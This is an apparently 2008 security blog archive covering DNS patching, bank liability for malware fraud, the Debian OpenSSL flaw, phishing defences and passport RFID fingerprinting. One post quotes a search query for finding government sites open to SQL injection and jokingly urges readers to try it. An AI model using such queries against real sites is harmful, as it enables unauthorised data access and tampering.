    I asked Dan what he thought about Thomas Ptacek’s (Thomas Ptacek of Matasano) comments suggesting that the flaw was blown out of proportion and Dan said that the flaw is very real and very serious and that the details will be out at Black Hat. Dan mentioned to me that he was very pleased with how everything has worked with the multi-vendor disclosure process, as he said, “we got several vendors together and it actually worked”. To be honest, this type of collaboration is long overdue, and there’s a lot of folks in the industry asking for it, and I’m not just talking about the tech companies cooperating, several banking and financial companies have discussed forums for knowledge sharing, and of course eBay has tried to pioneer this with their “eBay Red Team” event. It’s refreshing to hear a well respected researcher like Dan feeling very positive about an experience with multiple vendors working together (my own experience has been a lot of finger pointing and monkey business).

    Getting vendors to work together is quite an achievement. Getting them to work on security at the same time, instead of selling another silver bullet, is extraordinary, and Dan should write a book on that little trick:

    Toward addressing the flaw, Kaminsky said the researchers decided to conduct a synchronized, multivendor release and as part of that, Microsoft in its July Patch Tuesday released MS08-037. Cisco, Sun, and Bind are also expected to roll out patches later on Tuesday.

    As part of the coordinated release, Art Manion of CERT said vendors with DNS servers have been contacted, and there’s a longer list of additional vendors that have DNS clients. That list includes AT&T, Akamai, Juniper Networks, Inc., Netgear, Nortel, and ZyXEL. Not all of the DNS client vendors have announced patches or updates. Manion also confirmed that other nations with CERTs have also been informed of this vulnerability.

    Still, for the most part, the industry remains fully focussed on the enemy within, as exemplified by Ptacek's comment above. I remain convinced that the average "expert" wouldn't recognise a security fix until he's been firmly whacked over the head by it. Perhaps that is what Ptacek was thinking when he allegedly said:

    If the IETF would just find a way to embrace TLS/X509 instead of griping about how Verisign is out to get us we wouldn’t have this problem. Instead, DNSSEC tried to reinvent TLS by committee… well, surprise surprise, in 2008, we still care about 16 bit session IDs! Go Internet!

    Now, I admit to being a long-time supporter of TLS'ing everything (remember, there is only one mode, and it is secure!) but ... just ... Wow! I think this is what psychologists call the battered-wife syndrome; once we've been beaten black and blue with x.509 for long enough, maybe we start thinking that the way to quieten our oppressor down is to let him beat us some more. Yeah, honey, slap me with some more of that x.509 certificate love! Harder, honey, harder, you know I deserve it!

    Back to reality, and to underscore that there is something non-obvious about this DNS attack that remains unspoken (have you patched yet?), the above-mentioned commentator switched around 540 degrees and said:

    Patch Your (non-DJBDNS) Server Now. Dan Was Right. I Was Wrong.

    Thanks to Rich Mogull, Dino and I just got off the phone with Dan Kaminsky. We know what he’s going to say at Black Hat.

    What can we say right now?

    1. Dan’s got the goods. ...

    Redeemed! And, to be absolutely clear as to why this blog lays in with slap after slap: being able to admit a mistake should be the first criterion for any security guy. This puts Thomas way ahead of the rest of them.

    Can't say it more clearly than that: have you patched your DNS server yet?

    Posted by iang at 09:30 AM | Comments (4) | TrackBack

    July 06, 2008

    German court finds Bank responsible for malwared PC

    Spiegel reports that a German lower court ("Amtsgerichts Wiesloch (Az4C57/08)") has found a bank responsible for malware-driven transactions on a user's PC. In this case, her PC was infected with some form of malware that grabbed the password and presumably a fresh TAN (German one-time number to authenticate a single transaction) and scarfed 4000 euros through an eBay wash.

    Unfortunately the report is only in German, so the following analysis is limited and unreliable. It appears that the court's logic was that as the transaction was not authenticated by the user, it is the bank's problem.

    This seems fairly simple, except that Microsoft Windows-based PCs are difficult to keep clean of malware. In this case, the user had a basic anti-virus program, but that's not enough these days (see top tips on what helps).

    We in the security field all knew that, and customers are also increasingly becoming aware of it, but the question the banking and security world is asking itself is whether, why and when the bank is responsible for the user's insecure PC? Shouldn't the user take some of the risk for using an insecure platform?

    The answer is no. The risk belongs totally to the bank in this case, in the opinion of the Wiesloch court, and the court of financial cryptography agrees. Consider the old legal principle of putting the responsibility with the party best able to manage it. In this case, the user cannot manage it, manifestly. Further, the security industry knew that the Windows PC was not secure enough for risky transactions, and that Microsoft software was the dominant platform. The banking industry has had this advice in tanker-loads (c.f. EU "Finread"), and in many cases banks have even heeded the advice, only to discard it later. The banking industry decided to go ahead in the face of this advice and deploy online banking for support cost motives. The banks took on this risk, knowing the risk, and knowing that the customer could not manage this risk.

    Therefore, the liability falls completely to the bank in the basic circumstances described. In this blog's opinion! (It might have been different if the user had done something wrong, such as participating in a mule wash, or had carried on in the face of clear evidence of infection.)

    There is some suggestion that the judgment might become a precedent, or not. We shall have to wait and see, but one thing is clear: online banking has a rocky road ahead of it, as the phishing rooster comes home to roost. For a contrary example, another case in Cologne (Az: 9S195/07) mentioned in the article put the responsibility for EC-card abuse with the customer. As we know, smart cards can't speak to the user about what they are doing, so again we have to ask what the Windows PC was saying about the smart card's activities. If the courts hold the line that the user is responsible for her EC-card, then this can only cause the user to mistrust her EC-card, potentially leading to yet another failure of an expensive digital signing system.

    The costs for online banking are going to rise. A part of any solution, as frequently described by security experts, is to not trust widely deployed Microsoft Windows PCs for online banking, which in effect means PCs in general. A form of protection is fielded in some banks whereby the user's mobile phone is used to authenticate the real transaction over another channel. This is mostly cheap and mostly effective, but it isn't a comprehensive or permanent solution.
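    As a sketch of that second-channel idea (the names, key and message format here are mine, not any bank's): the confirmation code is bound to the transaction details the customer reads on the phone, so malware that rewrites the browser session cannot silently redirect the payment.

        import hmac, hashlib, secrets

        def make_challenge(dest_account, amount, key):
            """Bank side: bind a short code to the actual transaction."""
            nonce = secrets.token_hex(4)
            msg = f"{dest_account}|{amount}|{nonce}".encode()
            code = hmac.new(key, msg, hashlib.sha256).hexdigest()[:6]
            # Sent by SMS: "Pay 4000 EUR to DE89...? Code: <code>"
            return nonce, code

        def verify(dest_account, amount, nonce, code, key):
            msg = f"{dest_account}|{amount}|{nonce}".encode()
            expected = hmac.new(key, msg, hashlib.sha256).hexdigest()[:6]
            return hmac.compare_digest(code, expected)

        key = b"per-customer-shared-key"   # hypothetical
        nonce, code = make_challenge("DE89370400440532013000", "4000 EUR", key)
        print(verify("DE89370400440532013000", "4000 EUR", nonce, code, key))  # True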

    Posted by iang at 08:28 AM | Comments (3) | TrackBack

    June 22, 2008

    H4.2 -- Usability Determines the Number of Users

    Last week's discussion (here and here) over how there is only one mode, and it is secure, brought forth the delicious contrast with browsing and security: yes, you can do that but it doesn't work well. No, I'm not talking about the logos being cross-sited, but all of the 100 little flaws that you find when you try and do a website for secure purposes.

    So why bother? Financial cryptography eats its own medicine, but it doesn't do it for breakfast, lunch and dessert. Which reminds me to introduce another of the sub-hypotheses for critique:

    #4.2 Usability Determines the Number of Users

    Ease of use is the most important determinant of the number of users. Ease of implementation is important, ease of incorporation is also important, and even more important is the ease of use by end-users. This reflects a natural subdivision into several classes of users: implementors, integrators and end-users, each class of which can halt the use of the protocol if they find it ... unusable. As they are laid out serially between you and the marketplace, you have to consider usability to all of them.

    The protocol should be designed to be easy to code up, so as to help implementors help integrators help users. It should be designed to be easy to interface to, so as to help integrators help users. It should be designed to be easy to configure, so as to help users get security.

    If there are any complex or tricky features, ask yourself whether the benefit is really worth the cost of coder's time. It is not that developers cannot do it, it is simply that they will not do it; nobody has all the time in the world, and a protocol that is twice as long to implement is twice as likely to not get done.

    Same for integrators of systems. If the complexity provided by the protocol and the implementation causes X amount of work, and another protocol costs only X/2 then there is a big temptation to switch. Regardless of absolute or theoretical security.

    Same for users.

    Posted by iang at 08:13 AM | Comments (3) | TrackBack

    June 06, 2008

    The Dutch show us how to make money: Peace and Cash Foundation

    Sometime around 3 years back, banks started to respond to phishing efforts by putting in checks and controls to stop people sending money. This led to the emergence of a new business model that promised great returns on investment by arbitraging the controls, and has led to the enrichment of many! Now, my friends in NL have alerted me to the NVB's efforts to sell the Dutch on the possibilities.

    Welcome to the Peace and Cash Foundation!

    A fun few minutes, and even though it is in Dutch, the symbology should be understood. Does anyone have an English translation?

    (Okay, you might not see the Peace and Cash Foundation by the time you click on the site, but another generation will be there to help you to well-deserved riches...)

    Posted by iang at 01:00 PM | Comments (2) | TrackBack

    May 14, 2008

    Case study in risk management: Debian's patch to OpenSSL

    Ben Laurie blogs that downstream vendors like Debian shouldn't interfere with sensitive code like OpenSSL. Because they might get it wrong... And, in this case they did, and now all Debian + Ubuntu distros have 2-3 years of compromised keys. 1, 2.

    Further analysis shows however that the failings are multiple, are at several levels, and are shared all around. As we identified in 'silver bullets', fingerpointing is part of the problem, not the solution, so let's work the problem, as professionals, and avoid the blame game.

    First the tech problem. OpenSSL has a trick in it that mixes uninitialised memory in with the randomness generated by the OS's formal generator. The standard idea here is that it is good practice to mix different sources of randomness into your own source. Roughly following the designs from Schneier and Ferguson (Yarrow and Fortuna), modern operating systems take several random things like disk drive activity and net activity and mix the measurements into one pool, then run it through a fast hash to filter it.

    What is good practice for the OS is good practice for the application. The reason for this is that in the application, we do not know what the lower layers are doing, and especially we don't really know if they are failing or not. This is OK if it is an unimportant or self-checking thing like reading a directory entry -- it either works or it doesn't -- but it is bad for security programming. Especially, it is bad for those parts where we cannot easily test the result. And, randomness is that special sort of crypto that is very very difficult to test for, because by definition, any number can be random. Hence, in high-security programming, we don't trust the randomness of lower layers, and we mix our own [1].

    OpenSSL does this, which is good, but may be doing it poorly. What it (apparently) does is to mix in uninitialised buffers with the OS-supplied randoms, and little else (those who can read the code might confirm this). This is worth something, because there might be some garbage in the uninitialised buffers. The cryptoplumbing trick is to know whether it is worth the effort, and the answer is no: Often, uninitialised buffers are set to zero by lower layers (the compiler, the OS, the hardware), and often, they come from other deterministic places. So for the most part, there is no reasonable likelihood that it will be usefully random, and hence, it takes us too close to von Neumann's famous state of sin.

    Secondly, to take this next-to-zero source and mix it in to the good OS source in a complex, undocumented fashion is not a good idea. Complexity is the enemy of security. It is for this reason that people study the designs like Yarrow and Fortuna and implement general purpose PRNGs very carefully, and implement them in a good solid fashion, in clear APIs and files, with "danger, danger" written all over them. We want people to be suspicious, because the very idea is suspicious.

    Next. Cryptoplumbing by its nature involves lots of errors and fixes and patches. So bug reporting channels are very important, and apparently this one was used. The Debian team "found" the "bug" with an analysis tool called Valgrind. It was duly reported up to OpenSSL, but the handover was muffed. Let's skip the fingerpointing here; the reason it was muffed was that it wasn't obvious what was going on. And the reason it wasn't obvious, it seems, was that the code was too clever for its own good. It tripped up Valgrind (and Purify), it tripped up the Debian programmers, and the fix did not alert the OpenSSL programmers. Complexity is our enemy, always, in security code.

    So what in summary would you do as a risk manager?

    1. Listen for signs of complexity and cuteness. Clobber them when you see them.
    2. Know which areas of crypto are very hard, and which are "simple". Basically, public keys and random generation are both devilish areas. Block ciphers and hashes are not because they can be properly tested. Tune your alarm bells for sensitivity to the hard areas.
    3. If your team has to do something tricky (and we know that randomness is very tricky) then encourage them to do it clearly and openly. Firewall it into its own area: create a special interface, put it in a separate file, and paint "danger, danger" all over it. KISS, which means Keep the Interface Stupidly Simple.
    4. If you are dealing in high-security areas, remember that only application security is good enough. Relying on other layers to secure you is only good for medium-level security, as you are susceptible to divide and conquer.
    5. Do not distribute your own fixes to someone else's distro. Do an application work-around, and notify upstream. (Or, consider 4. above)
    6. These problems will always occur. Tech breaks, get used to it. Hence, a good high-security design always considers what happens when each component fails in its promise. Defence in depth. Systems that fail catastrophically with the failure of one component aren't good systems.
    7. Teach your team to work on the problem, not the people. Discourage fingerpointing; shifting the blame is part of the problem, not the solution. Everyone involved is likely smart, so the issues are likely complex, not superficial (if it was that easy, we would have done it).
    8. Do not believe in your own superiority. Do not believe in the superiority of others. Worry about people on your team who believe in their own superiority. Get help and work it together. Take your best shot, and then ...
    9. If you've made a mistake, own it. That helps others to concentrate on the problem. A lot. In fact, it even helps to falsely own other people's problems, because the important thing is the result.

    [1] A practical example is that which Zooko and I did in SDP1 with the initialising vector (IV). We needed different inputs (not random) so we added a counter, the time *and* some random from the OS. This is because we were thinking like developers, and we knew that it was possible for all three to fail in multiple ways. In essence we gambled that at least one of them would work, and if all three failed together then the user deserved to hang.
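    A minimal sketch of that approach (the names are mine, and SDP1 itself differs in detail): hash a counter, the clock and the OS randomness together, so that all three sources must fail at once before an IV repeats.

        import os, time, hashlib

        _counter = 0

        def next_iv(nbytes=16):
            global _counter
            _counter += 1
            material = (
                _counter.to_bytes(8, "big")          # deterministic, never repeats
                + time.time_ns().to_bytes(8, "big")  # clock: fails only if frozen
                + os.urandom(16)                     # OS pool: fails only if broken
            )
            return hashlib.sha256(material).digest()[:nbytes]

        print(next_iv().hex())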

    Posted by iang at 05:57 AM | Comments (8) | TrackBack

    May 11, 2008

    Phishing faceoff - Firefox 3 v. the market for your account

    Dria writes up a fine intro to the new Firefox security UI, the thing that forms the front line for phishing protection.

    Basically, the padlock has been replaced with a button that shows a "passport" icon in multiple colours and with explanatory text. Pretty good, although as far as I can see, this means you can no longer *look* and tell what is going on. OK, I'll run with that as an experiment! For now, there are 4 colours: grey, blue, green and yellow. Grey is for no identity, and I guess that also means no TLS although it isn't that clear as encryption edge-cases are not shown. Blue is Good, being the conventional browser security level, and Green is the EV colour for their new enhanced "better than before" identity verification.

    One minus: yellow is now a confusing colour. Before, it was the colour of success; now it is the colour of failure (although that failure is easily rectified by clicking to add an exception). As I commented before, we do need the colours to be re-aligned after a period of experimentation. Kudos to the Firefox team for taking that one on the chin; if only others were prepared to clearly unwind some well-meaning ideas...

    Second minus: as many said in comments, the "invalid identity verification" isn't always that; sometimes it is a non-third-party verification. The UI needs to distinguish between "identity not 3rd-party verified" and "self-verified."

    Indeed, our old friend, the self-identified or self-signed certificate, is widely used in the technical community for local and small-scale security systems, so we can see the messages "not trusted" and "invalid" are simply wrong. Now, Jonath says that Firefox is planning to do Key Continuity Management, so it may be that the confusing messages get cleaned up then. (I don't know if anyone else has spotted the nexus, but when we take KCM and combine it with 3rd party verifications, sometimes called variously TTP or CVP or certificate authorities, then we get the best of both worlds. It will eventually come, because it is so sensible.)

    One good plus: the CA is displayed in all cases where the certificate information is available. This is exceedingly important because it is the CA that does the verification of identity; Firefox only repeats it (which is why the "trusted" message is soooo wrong). Slowly but surely, we have to move the browser UI to pin the assertion on the CA, and we have to move the user to thinking about CAs as competing, branded entities that stand behind their statements. Publicly. At least, Firefox has not made the mistake that Microsoft has made with the new IE, which displays the name of the authority in some circumstances, but not others.

    It is important to realise: we can take a few missteps along the way, such as Gerv's noble attempt with the colour yellow. It is very costly to get these UIs built, trialled and tuned, so any experiments have to be taken with an expectation of more improvement in the future. As long as we're moving forward, things are getting better.

    What's all this about? Why is it important? Pop over to Francois' post on stolen accounts to see the real reason:

    (Hat tip to Gunnar again.) Them's hard numbers! A quick eyeball calculation over Francois's numbers reveals that the going price of a well-funded account is 8% of the value. This makes some sense, because getting access to the account details is easy and done in bulk, given that the security systems of online banks are so fundamentally and hopelessly flawed. What is more difficult is getting the money out, because, since the rise of phishing and the sticking of some of the liability, occasionally, to the banks, the online security teams have done some things to make it a little trickier. So the lion's share goes to the money launderer, who needs to pay a lot more in direct costs to get his hard-stolen loot out.

    How does this relate to Firefox? Phishing arose as an attack on the browser's security UI, so the Firefox team are working to address that issue with KCM, better displays of the CA name that makes the claim, and more clear symbols. The first 2 images above may help you to avoid the 3rd image.

    Unfortunately, the big picture overtook the browser world, so the work is only just starting. Phishing caused massive funds to flow into the attackers, so they invest in any attacks that might return more value. Especially, the attack profile now includes MITM and trojans, so hardening of the browser against inside attacks will be increasingly necessary.

    Remember, the threat is on the node, not on the wire; which gives us an answer to the question that Jonath was posing: Hardening against inside attacks should be on the agenda for future Firefox.

    Posted by iang at 12:44 PM | Comments (0) | TrackBack

    April 22, 2008

    Paypal -- Practical Approaches to Phishing -- open white paper

    Paypal has released a white paper on their approach to phishing. It is mostly good stuff. Here are their Principles:

    1. No Silver Bullet -- We have not identified any one solution that will single-handedly eradicate phishing; nor do we believe one will ever exist. ...

    2. Passive Versus Active Users -- When thinking about account security, we observe two distinct types of users among our customers. The first and far more common is the “passive” user. Passive users expect to be kept safe online with virtually no involvement of their own. They will keep their passwords safe, but they do not look for the “s” in https nor will they install special software packages or look for digital certificates. The active user, on the other hand, is the “see it/touch it/use it” person. They want two-factor authentication, along with every other bell and whistle that PayPal or the industry can provide. Our solution would have to differentiate between and address both of these groups.

    3. Industry Cooperation -- PayPal has been a popular “target of opportunity” for criminals due to our large account base of over 141 million accounts and the nature of our global service. However, while we may be an attractive target, we are far from the only one. Phishing is an industry problem, and we believe that we have a responsibility to help lead the industry toward solutions that help protect consumers – and the Internet ecosystem as a whole.

    4. Standards-based -- A preference for solutions based on industry standards could be considered a facet of industry cooperation, but we believe it’s important enough to stand on its own. If phishing is an industry problem, then industry standard solutions will have the widest reach and the least overhead – certainly compared to proprietary solutions. For that reason, we have consistently picked industry standard solutions.

    (Slightly edited.) That's a good start. The white paper explores their strategy and walks through their work with email signing. Short message: tough! No mention of the older generation technologies such as OpenPGP or S/MIME; instead, they create plugins to handle their signatures:

    To reach the active users who do not access their email through a signature-rendering email client, PayPal started working with Iconix, which offers the Truemark plug-in for many email clients. The software quickly and easily answers the question of “How do I know if a PayPal email is valid?” by rewriting the email inbox page to clearly show which messages have been properly signed.

    That's by way of indicating how poorly tools designed in the early 90s from poor security analysis and wrong threat models are coping with real threats.

    Next part is their work with the browser. It starts:

    4.1 Unsafe browsers

    There is of course, a corollary to safer browsers – what might be called “unsafe browsers.” That is, those browsers which do not have support for blocking phishing sites or for Extended Validation Certificates (a technology we will discuss later in this section). In our view, letting users view the PayPal site on one of these browsers is equal to a car manufacturer allowing drivers to buy one of their vehicles without seatbelts. The alarming fact is that there is a significant set of users who use very old and vulnerable browsers, such as Microsoft’s Internet Explorer 4 or even IE 3. ...

    Unsafe Browsers are a frequent complaint here and in other places. Some good stuff has been done, but it was too little, too late, and we now see the unfortunate damage that has been done. One of these effects was that it is now up to the big website operators, in this case PayPal, to start policing the browsers. Old versions of IE are to be blocked, and a recent warning shot indicates that browsers that don't support EV will be next.

    Next point: Paypal worked through several strategies. Three years ago, they pushed out a Toolbar (similar to the one listed on this blog). However this only works for those who download toolbars, a complaint frequently mentioned. So then Paypal shifted to working with Microsoft to adopt the technology into IE7, and now they have ridden the adoption curve of IE7 for free.

    Again this is exactly what should have been done: try it in toolbars then adopt it in the browser core. A cheap hint was missed and an expensive hit was scored:

    4.4 Extended Verification SSL Certificates

    Blocking offending sites works very well for passive users. However, we knew we needed to provide visual cues for our active users in the Web browser, much like we did with email signatures in the mail client.
    Fortunately, the safer browsers helped tremendously. Taking advantage of a new type of site certificate called ‘Extended Validation (EV) SSL Certificates,’ newer browsers such as IE 7 highlight the address bar in green when customers are on a Web site that has been determined legitimate. They also display the company name and the certificate authority name. So, by displaying the green glow and company name, these newer browsers make it much easier for users to determine whether or not they’re on the site that they thought they were visiting.

    This is a mixture of misinformation and danger for PayPal. The good part is that the browser, which is the authority on the CAs, now states definitively "Which Site" and also "Who says!" Green is a nice positive colour, too.

    So, when this goes wrong, as it will, the user has more information with which to seek solutions. This shifting of the information back to the user (whether they want it or not) will do much more towards aligning the liabilities.

    The bad part is that the browsers did not need a proprietary solution dressed up in a consortium in order to do this. They had indeed added the colour yellow (Firefox) and company name themselves, and the CA name has been an idea that I pushed repeatedly. For the record, Verisign asked for it early on as well. There's nothing special in the real business world about asking for "who says so?"

    So we now have a structural lock-in placed in the browsers which they could have done for free, on their own initiative. Where does this go from here? Well, it certainly helps PayPal in the short term (in the same way that they could have said to users "download Firefox, check the yellow bar and company name"). But beyond that, I see dangers. As I have frequently written about the costs of the security approach before, I'll skip it now.

    Overall, though, I'm pleased with the report. They have recognised that the industry has no solutions (no "silver bullets") and they have to do it themselves. They've implemented many different strategies, discarded some and improved others. Did it work? Yes, see the graph.

    Best of all, they've taken the wraps off and published their findings. One of the clear indications from recent research and breach laws is that opening up the information is critical to success, and that starts with the website people. It's your job, do it, but that doesn't mean you have to do it alone! You can help each other by sharing industry-validated results, which are the only ones of any value.

    To conclude, there are some other strategies that I'll suggest, and if PayPal are reading this, then they too can ask what's going on here:

    a. Get TLS/SNI into Apache and IIS. Why? So that virtual hosted sites -- the 99% -- can use TLS. This will lead grass-roots-style to an explosion in the use of TLS. (A sketch of what SNI provides follows this list.)

    Why's that helpful? (a) it will raise the profile of TLS work enormously, and that includes server-side and browser-side practices. It will help to re-direct all these resources above into security work in the browser. Right now, 1% of activity is in TLS. Priorities will change dramatically when that goes to 10%, and that means we can count on the browser teams to spend a whole lot more time on it. And (b) if all traffic goes over TLS, this reduces the amount of security work quite considerably because everything is within the TLS security model. Paypal already figured this, as "more or less all" their stuff is now under TLS, including the report!

    All browsers have already done their bit for TLS/SNI. Webservers are the laggards. Ask them.

    b. Hardened browser. Now that Firefox, IE and others have done some work to push attacks away from the user, the phishers are attacking the browsers from the inside. So there is a need to really secure the inside against attacks. Indeed Paypal already noted it in the report.

    c. Hardened website. This means *reducing the tech.* The more you please your users, the more you please your attackers.

    d. 2-channel authentication over the transaction. Okay, that's old news, but it bears repeating, because my online payment provider can only give me one of those old RSA fobs.

    e. The browser website interface is here to stay. Which means we are stuck with a pretty poor combination. What's the long term design path? Here's one view: it starts with client-side certificates and opportunistic cryptography. Why? Because otherwise, transactions are naked and vulnerable, and your efforts are piecemeal.

    Which means, don't replace the infrastructure wholesale, but re-tune it in the direction of security. Read the literature on secure transactions, none of it was ever employed in ecommerce, so it means there are lots of opportunities left for you :)

    (Firefox and IE are both doing early components in this area, so ask them what it's about!)

    f. Finally, bite the bullet and understand that your users will revolt one day, if you continue to keep fees high through industry-wide cooperation on lackadaisical fraud practices. High fraud and high loss means high fees which means high profits. One day the users will understand this, and revolt against your excuse. The manner this works is already well known to PayPal and it will happen to you, unless you adopt a competitive approach to fraud and to fees.
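    As promised above, a minimal sketch of what TLS/SNI buys (using Python's standard ssl module; the host name is a placeholder): the client names the desired site inside the TLS hello, so a single IP address can present the right certificate for each of many virtual hosts.

        import socket, ssl

        ctx = ssl.create_default_context()
        with socket.create_connection(("example.com", 443)) as raw:
            # server_hostname is the SNI field; without it, a virtual-hosted
            # server cannot know which certificate to present.
            with ctx.wrap_socket(raw, server_hostname="example.com") as tls:
                print(tls.getpeercert()["subject"])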

    Posted by iang at 02:27 PM | Comments (3) | TrackBack

    April 20, 2008

    Fair Disclosure via blogs? Anyone listening to Pow, Splat, Blech?

    Another message via the medium, this time from someone who knows how to use a remailer, and is therefore anonymous:

    Don't try this at home! (without an anonymizing proxy, anyway)

    Google willingly gives anyone a list of highly vulnerable US Government websites. Just write the following into the search box:

    gimme pow that do some splat

    These are sites that construct blah directly from blech. Most of them would respond to blah that are not supported by the blech-based interface, leaking sensitive information left and right. But quite a few would let you splat the splotches as well, up to and including blamming entire ker-blats.

    You didn't hear it from me.

    OK, that was fun. Problem now is, how does someone I don't know that won't hear it from me get it from someone I didn't hear it from?


    Late Addition: Now that anon has leaked the sensitive command, I realise this is what I first saw on Perilocity's post on WTF. Breach news is worse than politics; a week is ancient history. I can do no better than those guys. Still, to save a click, the basic thing is that you can see the SELECT command in the HTML of the website, and then use that example to craft your own. Here's a story of some sick public servants whom Oklahoma City felt the need to share with us all:

    Here's the rest of the message. I think we should all try it. Safety in numbers.

    Just write the following into the search box:
    allinurl:.gov select from where

    These are websites that construct SQL queries directly from the URL. Most of
    them would respond to queries that are not supported by the web-based UI of
    the website, leaking sensitive information left and right. But quite a few
    would let you modify the databases as well, up to and including dropping
    entire tables.

    The only question left is whether I'm not hearing from one anonymous or two? But you're not asking that.
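    For completeness, a sketch of the underlying flaw and its textbook repair (the table and parameter names are invented, not taken from any of the sites involved):

        import sqlite3

        conn = sqlite3.connect(":memory:")
        conn.execute("CREATE TABLE records (id INTEGER, name TEXT)")

        def vulnerable(url_param):
            # Flawed pattern: the URL parameter is pasted into the SQL,
            # so ?id=0 OR 1=1 returns every row in the table.
            return conn.execute(f"SELECT name FROM records WHERE id = {url_param}")

        def fixed(url_param):
            # Repair: the parameter is bound as data, never parsed as SQL.
            return conn.execute("SELECT name FROM records WHERE id = ?", (url_param,))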

    Posted by iang at 12:38 PM | Comments (2) | TrackBack

    April 16, 2008

    Proving that you know something about security...

    I recently received an (anonymous) comment on the 'silver bullets' paper that ran like this:

    Sellers most certainly still have more information than the vast majority of buyers based on the fact that they spend all of their time making security software.

    That's an important statement, and deserves to be addressed. How can we check that statement? Well, one way is that we could walk over to the world's biggest concentration of sellers and perhaps buyers, and test the waters? The RSA conference! Figuratively, blog-wise, Gunnar does just that:

    I went to RSA to speak with Brian Chess on Breaking Web Services. First time for me to RSA, I generally go to more geek-to-geek conferences like OWASP. It is a little weird to be in such a big convention. There were soooo many vendors yet most of the products in the massive trade show floor would have as much an impact on the security in your system as say plumbing fixtures. What is genuinely strange to me is that every other area in computers improves and yet security stagnates. For years the excuse that security people gave for their field's propensity to lameness is that "no one invests a nickel in security." However, that ain't the case any more and yet most of the products teh suck. This doesn't happen in other areas of computing - databases are vastly better than a decade ago, app servers same, OS same, go right down the list. What gives in security? Where is the innovation?

    This is more or less similar to the paper's selection of quotes. Anecdotally, evidence exists that insiders don't think sellers know enough, on both sides of the fence. However, surveys can be self-selecting (as was my sample of quotes in the paper), and opinions can be wrong. So it is important to realise that we have not proven one way or another, we've simply opened the door to an uncertainty.

    That is, it could be true that sellers don't know enough! How we then go on to show this, one way or another, is a subject for other (many) posts and possibly much more academic research. I don't for a moment think it reasonable or scientifically appropriate to prove this in one paper.

    Posted by iang at 07:01 AM | Comments (1) | TrackBack

    April 09, 2008

    another way to track their citizens

    Passports were always meant to help track citizens. According to lore, they were invented in the 19th century to stop Frenchmen evading the draft (conscription), which is still an issue in some countries. BigMac points to a Dutch working paper "Fingerprinting Passports," which indicates that passports can now be used to identify the bearer's country of issue, at a distance of maybe 25cm. Future Napoleons will be happy.

    Because terrorising the reader over breakfast is currently good writing style by governments and media alike, let's highlight the dangers first. The paper speculates:

    Given that we can remotely detect the presence of a passport of a particular country, how could this functionality be abused? One abuse case that has been suggested is a passport bomb, designed to go off if someone with a passport of a certain nationality comes close. One could even send such a bomb by post, say to an embassy. A less spectacular, but possibly more realistic, use of this functionality would be by passport thieves, who can remotely check if someone is carrying a passport and if it is of a ‘suitable’ nationality, before they decide to rob them.

    From the general fear department, we can also add that overseas travellers sometimes have a fear of being mugged, kidnapped, hijacked or simply shot because of their mere membership of a favourable or unfavourable country.

    Now that we have the FUD off our chest, let's talk details. The trick involves sending a series of commands (up to 4) to the RFID in the passport, each of which is presumably rejected by the passport. The manner of rejection differs from country to country, so a precise fingerprint-of-country can be formed simply by examining each rejection and then choosing a different command to further narrow the choices.
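    As a toy illustration of the trick (the probe commands and status words below are invented, not taken from the paper): each country's chip rejects an unsupported command slightly differently, so a short decision tree narrows down the issuer without ever authenticating.

        RESPONSES = {   # (reply to probe 1, reply to probe 2) -> issuer; hypothetical
            ("6A80", "6982"): "Country A",
            ("6D00", "6982"): "Country B",
            ("6A80", "6986"): "Country C",
        }

        def fingerprint(send):
            """send(command) -> status word; two rejected probes suffice here."""
            observed = (send("PROBE1"), send("PROBE2"))
            return RESPONSES.get(observed, "unknown")

        # A chip answering 6D00 then 6982 is identified as Country B:
        print(fingerprint({"PROBE1": "6D00", "PROBE2": "6982"}.get))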

    How did this happen? I would speculate that the root failure is derived from bureaucrats' never-ending appetite for complex technological solutions to simple problems. In this case, the first root cause is the use of the RFID, being by intention and design something that can be read from up to 10 cm.

    It is inherently attackable, and therefore by definition a very odd choice for security. The second complexity, then, involved implementing something to stop the attackers reading off the RFIDs without permission. The solution to an active read-off attack is encryption, of course! Which leads to our third complexity, a secret key, which is written inside the passport, of course! Which immediately raises issues of brute-forcing (of course!) and, as the paper references, it turns out that brute-forcing attacks work on some countries' passports because the secret key is ... poorly chosen.

    All of this complexity, er, solution, means something called Basic Access Control is added to the RFID in order to ensure the use of the secret key. Which means a series of commands meant to defend the RFID. If we factor in the tendency for each country to implement passports entirely alone (because they are more scared of each other than they are of their citizens), we can see that each solution is proprietary and home-grown. To cope with this, the standard was written to be very flexible (of course!). Hence, it permits wide diversity in response to errors.

    Whoops! Security error. In the world of security, we say that one should be precise in what we send, and precise in what we return.

    From that point of view, this is poor security work by the governments of the world, but that's to be expected. The US State Department can now derive some satisfaction from earlier blunders; because of their failure to implement any form of encryption or access control, American passports can be read by all (terrorists and borderists alike), which apparently forced them to add aluminium foil into the passport cover to act as a Faraday cage. Likely, the other countries will now have to follow suit, and the smugness of being sophisticated and advanced in security terms ("we've got BAC!") will be replaced by a dawning realisation that they should have adopted the simpler solutions in the first place.

    Posted by iang at 03:33 AM | Comments (3) | TrackBack

    March 25, 2008

    Pogo reports: big(gest) bank breach was covered up?

    An anomaly surfaces on the breach scene. Lynn reports in comments via dark reading to Pogo:

    With the exception of the Birmingham News, what may be the largest bank breach involving insider theft of data seems to have flown under the mainstream media radar. ...

    In light of the details now available, the breach appears to be the largest bank breach involving insider theft of data in terms of number of customers whose data were stolen. The largest incident to date for insider theft from a financial institution involved the theft of data on 8.5 million customers from Fidelity National Information Services by a subsidiary's employee.

    It is not clear at the time of this writing whether Compass Bank ever notified the more than 1 million customers that their data had been stolen or how it handled disclosure and notification. A request for additional information from Compass Bank was not immediately answered.

    I would guess that the Feds agreed to keep it quiet. And gave the institution a get-out-of-jail card for the disclosure requirement. It would be curious to see the logic, and I'd be skeptical. On the one side, the damage is done, and the potential for a sting or new information would not really be good enough to compensate for a million victims.

    On the other side, maybe they were also able to satisfy themselves that no more damage would be done? It still doesn't cut the mustard, because once identity victims get hit, they need the hard information to clear their credit records.

    But, in the light of yesterday's post, let's see this as an exception to the current US flavour of breach disclosure, and see if it sheds any light on costs of non-disclosure.

    Posted by iang at 08:11 AM | Comments (4) | TrackBack

    March 13, 2008

    Trojan with Everything, To Go!

    more literal evidence of ... well, everything really:

    Targeting over 400 banks (including my own :( ! ) and having the ability to circumvent two-factor authentication are just two of the features that push Trojan.Silentbanker into the limelight. The scale and sophistication of this emerging banking Trojan is worrying, even for someone who sees banking Trojans on a daily basis.

